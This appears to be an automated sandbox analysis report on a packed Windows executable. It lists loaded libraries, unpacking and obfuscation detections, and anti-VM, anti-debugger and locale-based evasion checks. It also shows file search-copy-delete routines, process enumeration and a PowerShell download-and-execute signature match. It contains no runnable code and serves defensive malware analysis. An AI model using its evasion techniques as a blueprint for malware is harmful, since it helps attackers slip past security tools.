Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Unpacked PE file: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.jozizud:R;.raxup:R;.maweb:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Unpacked PE file: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00419860

Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Static PE information: section name: .jozizud
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Static PE information: section name: .raxup
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Static PE information: section name: .maweb

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0041B035 push ecx; ret	0_2_0041B048
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040020D pushfd ; iretd	0_2_00400211
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00757876 push eax; ret	0_2_00757894
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00758C2E push ds; retf	0_2_00758CC7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_007548A7 push 7DD07DC0h; iretd	0_2_007548B8
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00757885 push eax; ret	0_2_00757894
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00753DA1 pushfd ; iretd	0_2_00753DA4
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022BB29C push ecx; ret	0_2_022BB2AF

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

0_2_00419860

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-26379

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Evaded block: after key decision

graph_0-27537

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

API coverage: 6.9 %

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E430
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004138B0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00414570
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414910
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040ED20
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE70
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DE10
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004016D0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DA80
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00413EA0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F6B0
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_022AE697
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_022B3B17
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022B4B77
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_022AEF87
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_022B47D7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022AE077
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_022ADCE7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AF8F1 FindFirstFileA,	0_2_022AF8F1
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_022AC0D7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022A1937
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_022B4107
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_022AF917

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00401160 GetSystemInfo,ExitProcess,

0_2_00401160

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.0000000000799000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204081074.000000000073E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-26364
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-26367
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-26383
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-26378
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-26407
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-26206
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-27794
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	API call chain: ExitProcess graph end node	graph_0-26251

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041AD48

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

0_2_004045C0

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

0_2_00419860

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]	0_2_00419750
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00752B77 push dword ptr fs:[00000030h]	0_2_00752B77
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022A092B mov eax, dword ptr fs:[00000030h]	0_2_022A092B
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B99B7 mov eax, dword ptr fs:[00000030h]	0_2_022B99B7
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022A0D90 mov eax, dword ptr fs:[00000030h]	0_2_022A0D90

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00417850

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041AD48
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0041CEEA SetUnhandledExceptionFilter,	0_2_0041CEEA
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B33A
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022BAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_022BAFAF
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022BD151 SetUnhandledExceptionFilter,	0_2_022BD151
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022BB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_022BB5A1

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00419600
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: 0_2_022B9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_022B9867

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_00417B90
Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_022B7DF7

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00416920

Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00417850

